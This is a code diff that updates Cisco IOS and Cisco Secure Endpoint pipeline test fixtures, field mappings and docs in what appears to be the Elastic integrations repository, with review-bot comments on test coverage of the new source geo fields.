- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -122,10 +122,10 @@
 },
 "source": {
 "packets": 1,
- "address": "198.51.100.1",
- "ip": "198.51.100.1"
+ "address": "192.168.100.1",
+ "ip": "192.168.100.1"
 },
- "message": "list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet",
+ "message": "list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet",
 "tags": [
 "preserve_original_event"
 ],
@@ -139,15 +139,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.1",
+ "192.168.100.1",
 "255.255.255.255"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 585919,
- "ingested": "2021-09-07T07:59:38.898651100Z",
- "original": "Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -\u003e 255.255.255.255, 1 packet",
+ "ingested": "2021-12-09T13:35:26.832471900Z",
+ "original": "Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -\u003e 255.255.255.255, 1 packet",
 "code": "IPACCESSLOGNP",
 "provider": "firewall",
 "action": "deny",
@@ -165,26 +165,56 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 22,
- "address": "2001:DB8:1000::1",
- "ip": "2001:DB8:1000::1"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "source": {
- "address": "2001:DB8::3",
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "port": 1027,
 "packets": 9,
- "ip": "2001:DB8::3"
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
- "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets",
+ "message": "list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:MFLZEQR2gBCpxJEXRvaB0jjkxNA=",
+ "community_id": "1:BI3p2ifMfqVkYuAqbGRcjozcbnA=",
 "transport": "tcp",
 "type": "ipv6",
 "packets": 9
@@ -194,15 +224,14 @@
 },
 "related": {
 "ip": [
- "2001:DB8::3",
- "2001:DB8:1000::1"
+ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 585920,
- "ingested": "2021-09-07T07:59:38.898657Z",
- "original": "May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -\u003e 2001:DB8:1000::1(22), 9 packets",
+ "ingested": "2021-12-09T13:35:26.832477600Z",
+ "original": "May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -\u003e 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets",
 "code": "ACCESSLOGP",
 "provider": "firewall",
 "action": "allow",
@@ -220,26 +249,26 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
 "port": 15600,
- "address": "198.51.100.255",
- "ip": "198.51.100.255"
+ "address": "192.168.100.255",
+ "ip": "192.168.100.255"
 },
 "source": {
- "address": "198.51.100.195",
+ "address": "192.168.100.195",
 "port": 55250,
 "packets": 1,
- "ip": "198.51.100.195"
+ "ip": "192.168.100.195"
 },
- "message": "list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet",
+ "message": "list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:7qvTEOLkmhTrK1y9mKNwCENQbeU=",
+ "community_id": "1:StJhZzrkK7s6tPeVb3BmxbE0NZ0=",
 "transport": "udp",
 "type": "ipv4",
 "packets": 1
@@ -249,15 +278,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.195",
- "198.51.100.255"
+ "192.168.100.195",
+ "192.168.100.255"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663303,
- "ingested": "2021-09-07T07:59:38.898662100Z",
- "original": "Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -\u003e 198.51.100.255(15600), 1 packet",
+ "ingested": "2021-12-09T13:35:26.832482100Z",
+ "original": "Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -\u003e 192.168.100.255(15600), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -275,19 +304,19 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
- "address": "198.51.100.2",
- "ip": "198.51.100.2"
+ "address": "192.168.100.2",
+ "ip": "192.168.100.2"
 },
 "source": {
 "packets": 1,
- "address": "198.51.100.1",
- "ip": "198.51.100.1"
+ "address": "192.168.100.1",
+ "ip": "192.168.100.1"
 },
- "message": "list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet",
+ "message": "list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet",
 "icmp": {
 "type": "3",
 "code": "4"
@@ -296,7 +325,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:9lO0Kj0TpXAVNWuiPRAyFAGtCqM=",
+ "community_id": "1:qFmXhpjtK+/aneNSpMgRiI7dwi4=",
 "transport": "icmp",
 "type": "ipv4",
 "packets": 1
@@ -306,15 +335,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.1",
- "198.51.100.2"
+ "192.168.100.1",
+ "192.168.100.2"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663304,
- "ingested": "2021-09-07T07:59:38.898667600Z",
- "original": "Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -\u003e 198.51.100.2 (3/4), 1 packet",
+ "ingested": "2021-12-09T13:35:26.832487Z",
+ "original": "Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -\u003e 192.168.100.2 (3/4), 1 packet",
 "code": "IPACCESSLOGDP",
 "provider": "firewall",
 "action": "deny",
@@ -332,26 +361,26 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
 "port": 15600,
- "address": "198.51.100.255",
- "ip": "198.51.100.255"
+ "address": "192.168.100.255",
+ "ip": "192.168.100.255"
 },
 "source": {
- "address": "198.51.100.195",
+ "address": "192.168.100.195",
 "port": 54309,
 "packets": 1,
- "ip": "198.51.100.195"
+ "ip": "192.168.100.195"
 },
- "message": "list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet",
+ "message": "list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:UaC2rOjKSQBEmX+jEyiQatg9eGI=",
+ "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=",
 "transport": "udp",
 "type": "ipv4",
 "packets": 1
@@ -361,15 +390,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.195",
- "198.51.100.255"
+ "192.168.100.195",
+ "192.168.100.255"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 1663312,
- "ingested": "2021-09-07T07:59:38.898672600Z",
- "original": "Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -\u003e 198.51.100.255(15600), 1 packet",
+ "ingested": "2021-12-09T13:35:26.832491400Z",
+ "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet",
 "code": "IPACCESSLOGP",
 "provider": "firewall",
 "action": "deny",
@@ -390,14 +419,14 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "event": {
 "severity": 6,
 "sequence": 1663313,
- "ingested": "2021-09-07T07:59:38.898677200Z",
- "original": "Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets",
+ "ingested": "2021-12-09T13:35:26.832496700Z",
+ "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets",
 "code": "IPACCESSLOGRL",
 "provider": "firewall",
 "category": "network",
@@ -417,26 +446,26 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "port": 15600, - "address": "198.51.100.255", - "ip": "198.51.100.255" + "address": "192.168.100.255", + "ip": "192.168.100.255" }, "source": { - "address": "198.51.100.195", + "address": "192.168.100.195", "port": 43989, "packets": 1, - "ip": "198.51.100.195" + "ip": "192.168.100.195" }, - "message": "list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:CdrzBOQ6Cohqy+Mgg9EZnl1nHFs=", + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", "transport": "udp", "type": "ipv4", "packets": 1 @@ -446,15 +475,15 @@ }, "related": { "ip": [ - "198.51.100.195", - "198.51.100.255" + "192.168.100.195", + "192.168.100.255" ] }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-09-07T07:59:38.898681700Z", - "original": "Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -\u003e 198.51.100.255(15600), 1 packet", + "ingested": "2021-12-09T13:35:26.832503Z", + "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", 
@@ -472,41 +501,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59832, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VrawQ+fBZ7zfHStQfvTOW1zQANA=", + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", "transport": "tcp", "type": "ipv4", "packets": 1 
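Review bot: The source side of this event is never geo/AS-enriched in the new expected output: `source.ip` becomes `192.168.100.12` (RFC 1918, which the GeoIP processor does not look up), so only the `81.2.69.144` destination gains `geo` and `as` blocks. If the pipeline is meant to enrich `source.ip` as the new `source.geo.*`/`source.as.*` mappings in this same change suggest, at least one fixture event should carry a public address from the supported test subset on the source side (for example `"address": "81.2.69.144"` / `"ip": "81.2.69.144"` under `"source"`) so that path and its `related.ip` entry are actually validated; moving all former 198.51.100.0/24 addresses into private space removes that coverage. The enclosing event object starts and ends outside this hunk.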
@@ -516,15 +548,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-09-07T07:59:38.898686400Z", - "original": "Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:35:26.832509400Z", + "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -545,14 +577,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-09-07T07:59:38.898692200Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", + "ingested": "2021-12-09T13:35:26.832517300Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", "category": "network", @@ -572,19 +604,19 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { - "address": "198.51.100.1", - "ip": "198.51.100.1" + "address": "192.168.100.1", + "ip": "192.168.100.1" }, "source": { "packets": 32, - "address": "198.51.100.12", - "ip": "198.51.100.12" + "address": "192.168.100.12", + "ip": "192.168.100.12" }, - "message": "list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "message": "list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "icmp": { "type": "3", "code": "3" 
@@ -593,7 +625,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=", + "community_id": "1:iJX04o1L7tLCbqhG80H5P/Nx4FY=", "transport": "icmp", "type": "ipv4", "packets": 32 @@ -603,15 +635,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "198.51.100.1" + "192.168.100.12", + "192.168.100.1" ] }, "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-09-07T07:59:38.898696900Z", - "original": "Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -\u003e 198.51.100.1 (3/3), 32 packets", + "ingested": "2021-12-09T13:35:26.832521600Z", + "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", "action": "deny", 
@@ -629,41 +661,44 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "172.217.10.46", + "address": "81.2.69.144", "port": 80, - "ip": "172.217.10.46" + "ip": "81.2.69.144" }, "source": { - "address": "198.51.100.12", + "address": "192.168.100.12", "port": 59834, "packets": 1, - "ip": "198.51.100.12" + "ip": "192.168.100.12" }, - "message": "list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=", + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", "transport": "tcp", "type": "ipv4", "packets": 1 
@@ -673,15 +708,15 @@ }, "related": { "ip": [ - "198.51.100.12", - "172.217.10.46" + "192.168.100.12", + "81.2.69.144" ] }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-09-07T07:59:38.898701400Z", - "original": "Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -\u003e 172.217.10.46(80), 1 packet", + "ingested": "2021-12-09T13:35:26.832527Z", + "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", "action": "deny", @@ -699,7 +734,7 @@ "log": { "level": "notification", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -733,8 +768,8 @@ "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-09-07T07:59:38.898705900Z", - "original": "Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", + "ingested": "2021-12-09T13:35:26.832533500Z", + "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", "category": "network", @@ -762,7 +797,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "source": { 
@@ -776,8 +811,8 @@ "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-09-07T07:59:38.898710400Z", - "original": "Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", + "ingested": "2021-12-09T13:35:26.832539800Z", + "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", @@ -804,7 +839,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -835,8 +870,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-09-07T07:59:38.898719300Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:35:26.832546Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -861,7 +896,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { 
@@ -892,8 +927,8 @@ "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-09-07T07:59:38.898723900Z", - "original": "Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", + "ingested": "2021-12-09T13:35:26.832551200Z", + "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", "action": "multicast-join", @@ -924,14 +959,14 @@ "log": { "level": "warning", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-09-07T07:59:38.898728100Z", - "original": "Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", + "ingested": "2021-12-09T13:35:26.832556400Z", + "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", "category": "network", 
@@ -954,14 +989,14 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-09-07T07:59:38.898732400Z", - "original": "Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", + "ingested": "2021-12-09T13:35:26.832560700Z", + "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", "category": "network", diff --git a/packages/cisco_ios/data_stream/log/fields/ecs.yml b/packages/cisco_ios/data_stream/log/fields/ecs.yml index 0439aa8651e..005eed89496 100644 --- a/packages/cisco_ios/data_stream/log/fields/ecs.yml +++ b/packages/cisco_ios/data_stream/log/fields/ecs.yml @@ -6,6 +6,12 @@ name: destination.as.number - external: ecs name: destination.as.organization.name +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.region_iso_code +- external: ecs + name: destination.geo.region_name - external: ecs name: destination.geo.continent_name - external: ecs @@ -82,5 +88,25 @@ name: source.port - external: ecs name: source.user.name +- external: ecs + name: source.as.number +- external: ecs + name: source.as.organization.name +- external: ecs + name: source.geo.continent_name +- external: ecs + name: source.geo.country_iso_code +- external: ecs + name: source.geo.country_name +- external: ecs + name: source.geo.city_name +- external: ecs + name: source.geo.region_iso_code +- external: ecs + name: source.geo.region_name +- description: Longitude and latitude. + level: core + name: source.geo.location + type: geo_point - external: ecs name: tags 
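Review bot: `source.geo.location` is the only new field in this hunk declared inline (`description: Longitude and latitude.` / `level: core` / `type: geo_point`) while every other added entry, including the other `source.geo.*` and `source.as.*` fields, is imported with `external: ecs`. Unless elastic-package cannot resolve the ECS `geo_point` definition here, it should be declared the same way, `- external: ecs` / `  name: source.geo.location`, so the description and type stay in sync with the ECS version the package references instead of drifting. If the inline form is deliberate, a one-line comment above it stating why (e.g. `# declared inline: ECS import does not supply geo_point here`) would stop the next reviewer from "fixing" it. Note also that every `source.ip` in the updated fixtures is in 192.168.100.0/24, so these new source-side mappings appear to be unexercised by the pipeline test.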
diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 3c2aa3f2c6e..6b0bdbd335e 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md @@ -131,10 +131,13 @@ An example event for `log` looks as following: | destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | destination.as.organization.name | Organization name. | keyword | +| destination.geo.city_name | City name. | keyword | | destination.geo.continent_name | Name of the continent. | keyword | | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | | destination.geo.location | Longitude and latitude. | geo_point | +| destination.geo.region_iso_code | Region ISO code. | keyword | +| destination.geo.region_name | Region name. | keyword | | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.port | Port of the destination. | long | | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | 
@@ -192,6 +195,15 @@ An example event for `log` looks as following: | related.ip | All of the IPs seen on your event. | ip | | related.user | All the user names or other user identifiers seen on the event. | keyword | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| source.as.organization.name | Organization name. | keyword | +| source.geo.city_name | City name. | keyword | +| source.geo.continent_name | Name of the continent. | keyword | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.geo.country_name | Country name. | keyword | +| source.geo.location | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | | source.ip | IP address of the source (IPv4 or IPv6). | ip | | source.packets | Packets sent from the source to the destination. | long | | source.port | Port of the source. | long | diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index fd74025767e..40e349f8834 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.2.0 +version: 1.2.1 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index df61cfa6363..ae08da24345 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log index 211de5d2bc9..db356536df5 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log 
@@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} 